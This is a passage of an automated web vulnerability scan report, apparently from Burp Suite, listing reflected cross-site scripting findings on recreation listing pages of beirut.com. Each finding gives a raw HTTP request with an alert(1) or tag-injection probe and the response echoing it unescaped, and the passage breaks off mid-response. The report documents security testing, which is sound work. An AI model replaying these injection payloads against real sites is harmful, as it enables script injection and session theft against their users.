4.670. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7279d'-alert(1)-'e9af28b17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations7279d'-alert(1)-'e9af28b17/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations7279d'-alert(1)-'e9af28b17/Bowling-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.671. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4478d"><a>78f68414b5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations4478d"><a>78f68414b5a/Bowling-Centers/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:14:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations4478d"><a>78f68414b5a">
...[SNIP]...

4.672. http://www.beirut.com/Recreations/Bowling-Centers/93987864 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Bowling-Centers/93987864

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94851'-alert(1)-'3f9f1762b71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Bowling-Centers94851'-alert(1)-'3f9f1762b71/93987864 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:27:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Bowling-Centers94851'-alert(1)-'3f9f1762b71';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.673. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7745'-alert(1)-'58f981d477 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreationsa7745'-alert(1)-'58f981d477/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreationsa7745'-alert(1)-'58f981d477/Golf-Clubs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.674. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b1e"><a>b28c59e248f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsf1b1e"><a>b28c59e248f/Golf-Clubs/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:20:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreationsf1b1e"><a>b28c59e248f">
...[SNIP]...

4.675. http://www.beirut.com/Recreations/Golf-Clubs/926389688 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Golf-Clubs/926389688

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adbf5'-alert(1)-'d1930d19a84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Golf-Clubsadbf5'-alert(1)-'d1930d19a84/926389688 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:34:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreations/Golf-Clubsadbf5'-alert(1)-'d1930d19a84';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.676. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1511'-alert(1)-'cf628a96a28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreationsf1511'-alert(1)-'cf628a96a28/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Recreationsf1511'-alert(1)-'cf628a96a28/Horseback-Riding';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.677. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b1e"><a>d058ff3c489 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations68b1e"><a>d058ff3c489/Horseback-Riding/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:15:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations68b1e"><a>d058ff3c489">
...[SNIP]...

4.678. http://www.beirut.com/Recreations/Horseback-Riding/6888394074 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Horseback-Riding/6888394074

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 196be'-alert(1)-'66f2ac5e128 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Horseback-Riding196be'-alert(1)-'66f2ac5e128/6888394074 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Recreations/Horseback-Riding196be'-alert(1)-'66f2ac5e128';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.679. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abe6"><a>5ba29b42c39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreations9abe6"><a>5ba29b42c39/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:19:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Recreations9abe6"><a>5ba29b42c39">
...[SNIP]...

4.680. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 113d0'-alert(1)-'d9ebdf230b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations113d0'-alert(1)-'d9ebdf230b6/Play-Centers/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:24:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations113d0'-alert(1)-'d9ebdf230b6/Play-Centers';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.681. http://www.beirut.com/Recreations/Play-Centers/83897013 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Play-Centers/83897013

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0296'-alert(1)-'5c69626aca9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations/Play-Centersd0296'-alert(1)-'5c69626aca9/83897013 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:31:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Recreations/Play-Centersd0296'-alert(1)-'5c69626aca9';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.682. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74193'-alert(1)-'57ee2bbc39d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Recreations74193'-alert(1)-'57ee2bbc39d/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:28:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Recreations74193'-alert(1)-'57ee2bbc39d/Pool-Halls';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.683. http://www.beirut.com/Recreations/Pool-Halls/2561106634 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Recreations/Pool-Halls/2561106634

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebbcf"><a>a25aa467a08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Recreationsebbcf"><a>a25aa467a08/Pool-Halls/2561106634 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:21:58 GMT
Server: Apache/2.2.3 (CentOS)
